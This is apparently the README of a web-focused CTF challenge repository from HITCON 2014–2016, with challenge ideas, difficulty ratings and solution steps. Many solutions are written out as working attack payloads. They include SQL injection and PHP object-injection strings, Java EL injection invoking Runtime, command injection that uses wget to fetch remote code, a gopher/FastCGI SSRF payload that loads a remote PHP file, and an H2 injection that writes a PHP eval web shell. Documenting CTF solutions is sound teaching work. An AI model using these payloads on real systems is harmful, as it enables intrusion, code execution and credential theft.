Hi, I am Orange. This is the repo of CTF challenges I made. It contains challs's source code, writeup and some idea explanation.
I am a CTFer and Bug Bounty Hunter, loving web hacking and penetration testing. So you will see these challs are all about web. If you have any question about these challs, you can find me in following ways
Hope you will like it :)
P.s. By the way, Babyfirst is my favorite one in all of challenges, if you don't have time to see all, please look it at lease!
Difficulty: ★
Sovled: 71 / 1024
Tag: BlackBox, SSL, Pentesting
- Use SSL certificate to leak internal hostname
$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternativer Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = orange@chroot.org
...
# get flag
$ curl -k -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/
Difficulty: ★★
Sovled: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS
- Break JavaScript Sandbox
- Use NodeJS
Buffer(int)
to steal uninitialized memory - Node.js Buffer knows everything
$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;
TBD
Difficulty: ★★★
Sovled: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize
- Create an Unexpected Object and Don't Invoke __wakeup() in Deserialization
- SugarCRM v6.5.23 PHP反序列化對象注入漏洞
- MySQL UTF-8 collation -
SELECT 'Ä'='a'
is True
# get password
curl http://1.2.3.4/
?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}
# get flag
curl http://1.2.3.4/
?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}
Difficulty: ★★☆
Sovled: 43 / 1024
Tag: GrayBox, Java
new String(new byte[] {1, -1, 1, -1})
will output01EFBFBD01EFBFBD
, not01FF01FF
- When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions
- [here](hitcon-ctf-2016/angry boy)
- [exploit.py](hitcon-ctf-2016/angry boy/exploit.py)
- [decrpt.py](hitcon-ctf-2016/angry boy/decrypt.py)
Difficulty: ★★★★
Sovled: 4 / 1024
Tag: GrayBox, Java, Seam Framework, CSS RPO, EL Injection, Java Deserialization
- CSS Relative Path Overwrite
- Built-in redirection parameter
actionOutcome
- RPO Gadgets
- CVE-2010-1871: JBoss Seam Framework remote code execution
- [here](hitcon-ctf-2016/angry seam)
**P.s.** I made this challenge because once when I try to review the code of Seam Framework, I found some 0-days and I think it must have more. So I throw out the brick to attract a jade. And the result is more than I expected :P
Intended solution
-
Register an account
username: `AAAAAA` password: `AAAAAA` realname: `{/*';*/}%0a@import'http://orange.tw/?`
-
Report URL
http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom>e=/profile.seam?username%3dAAAAAA
**Unintended solution**
-
Register an account
-
Update description to
/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
-
Login and access
GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1 host: 1.2.3.4 cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))} ccc: ls -alh ...
<br>
**Unintended solution**
* CVE-2013-2165 Java deserialization vulnerability
<br>
**Unintended solution**
* SESSION manipulation... seam SUCKS
#### Write Ups
* [Web500 Hitconctf 2016 and exploit CVE-2013-2165](http://vnprogramming.com/index.php/2016/10/10/web500-hitconctf-2016-and-exploit-cve-2013-2165/)
* [Angry Seam (500 pts)](https://github.com/Blaklis/write-ups/tree/master/hitcon)
## **Babyfirst**
Sovled: **33 / 969**
Difficulty: **★★**
Tag: **WhiteBox**, **PHP**, **Command Injection**
#### Idea
* Use `NewLine` to bypass regular expression check
* Command injection only with alphanumeric characters
#### Source Code
* [here](hitcon-ctf-2015/babyfirst)
```php
<?php
highlight_file(__FILE__);
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
mkdir($dir);
chdir($dir);
$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
if ( !preg_match('/^\w+$/', $args[$i]) )
exit();
}
exec("/bin/orange " . implode(" ", $args));
?>
http://localhost/
?args[0]=x%0a
&args[1]=mkdir
&args[2]=orange%0a
&args[3]=cd
&args[4]=orange%0a
&args[5]=wget
&args[6]=846465263%0a
http://localhost/
?args[0]=x%0a
&args[1]=tar
&args[2]=cvf
&args[3]=aa
&args[4]=orange%0a
&args[5]=php
&args[6]=aa
And there are also lots of creative solutions, you can check the write ups below.
- babyfirst (web 100)
- HITCON CTF 2015 Web 100 Web 300 Writeup
- HITCON 2015 Quals: Babyexploit
- Babyfirst (web, 100p, ?? solves)
Difficulty: ★★★
Sovled: 18 / 969
Tag: GrayBox, C, PWN
- Pwn without library
- Format String without output
- Bypass Stack Guard by using overflow
ARGV[1]
- nanana (pwn, web 200)
- HITCON 2015 Quals: Nanana
- Pwning (sometimes) with style - Dragons’ notes on CTFs
Difficulty: ★★★☆
Sovled: 16 / 969
Tag: WhiteBox, PHP
- Break PHP PRNG
- Break shared PRNG STATE in Apache Prefork mode
TBD
- HITCON CTF 2015 Web 100 Web 300 Writeup
- Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)
- HITCON 2015 WEB 300
Difficulty: ★★★☆
Sovled: 2 / 969
Tag: BlackBox, PHP, SSRF
- Bypass SSRF restrictiton with 302 redirect
- Exploit FASTCGI protocol by using GOPHER
<?php
header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );
Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN
- Bypass open_basedir
- Bypass disable_functions
- PHP use-after-free exploit writing
- Bypass full protection (DEP / ASLR / PIE / FULL RELRO)
TBD
Solved: 8 / 1020
Difficulty: ★★
Platform: BlackBox, PHP, H2, SQL Injection
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
TBD
- HITCON CTF 2014: PUSHIN CAT
- HITCON CTF 2014 - PUSHIN CAT (H2 DB Insert SQL Injection)
- HITCON CTF 2014
Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision, HPP
- Python CGI HTTP Pollution
- MySQL old_password hash collisions
- PBKDF2+HMAC hash collisions explained
TBD
Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache
- Multilayered architecture vulnerability
- Double Encoding
# get password
$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm
# get flag
$ curl http://1.2.3.4/admin/thefl4g.txt
Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF
- Multilayered architecture vulnerability
- Default and up to date mod_jk leads to directory travesal
- Bypass WAF by incorrect usage of BASE64 and URLENCODE
- SQL Injection on H2 Database
- Execute Code by using H2 SQL Injection
-
Get source code
http://1.2.3.4/login/..;/
-
Review code and find a way to bypass WAF
$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--" $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"
-
Write shell
$ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--" $ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'
TBD
Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, SQL Injection, LFI, Race Condition
- One-byte off SQL Injection
- Race Condition
-
Run exploit.py to win race condition
-
Login and SQL Injection
$ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\¬e=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'
-
Local file inclusion with session
$ curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220